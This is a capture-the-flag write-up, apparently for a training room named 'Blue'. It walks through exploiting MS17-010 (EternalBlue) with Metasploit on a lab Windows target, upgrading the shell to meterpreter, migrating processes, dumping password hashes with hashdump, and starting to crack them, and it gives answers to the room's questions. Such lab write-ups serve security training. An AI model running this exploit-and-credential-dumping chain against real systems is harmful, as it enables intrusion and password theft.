Create a directory for machine on the Desktop and a directory containing the scans with nmap.
suecho"10.10.33.26 blue.thm">>/etc/hostsmkdirthm/bluecdthm/blue# At the end of the room# To clean up the last line from the /etc/hosts filesed-i'$ d'/etc/hosts
I prefer to start recon by pinging the target, this allows us to check connectivity and get OS info.
Sending these three ICMP packets, we see that the Time To Live (TTL) is ~128 secs. this indicates that the target is a windows system, while *nix systems usually have a TTL of 64 secs.
1.2 - How many services are running under port 1000?
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) https://www.exploit-db.com/exploits/42315 or we can find it with searchsploit (CLI).
MS17-010
Task 2 - Gain Access
2.1 - Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)
Start Metasploit
msfconsole-q
msf6>searchms17-010
================# Name Disclosure Date Rank Check Description----------------------------------------0exploit/windows/smb/ms17_010_eternalblue2017-03-14averageYesMS17-010EternalBlueSMBRemoteWindowsKernelPoolCorruption1exploit/windows/smb/ms17_010_psexec2017-03-14normalYesMS17-010EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCodeExecution2auxiliary/admin/smb/ms17_010_command2017-03-14normalNoMS17-010EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCommandExecution3auxiliary/scanner/smb/smb_ms17_010normalNoMS17-010SMBRCEDetection4exploit/windows/smb/smb_doublepulsar_rce2017-04-14greatYesSMBDOUBLEPULSARRemoteCodeExecution
exploit/windows/smb/ms17_010_eternalblue
2.2 - Show options and set the one required value. What is the name of this value? (All caps for submission)
3.1 - Convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
MatchingModules================# Name Disclosure Date Rank Check Description----------------------------------------0post/multi/manage/shell_to_meterpreternormalNoShelltoMeterpreterUpgrade
3.2 - Select this (use MODULE_PATH). Show options, what option are we required to change?
3.3 - Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.
meterpreter>migrate1068[*] Migrating from 1364 to 1068...[*] Migration completed successfully.meterpreter>migrate1704[*] Migrating from 1068 to 1704...meterpreter>migrate1688[*] Migrating from 1068 to 1688...[*] Migration completed successfully.
Task 4 - Cracking
4.1 - Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Jon
4.2 - Copy this password hash to a file and research how to crack it. What is the cracked password?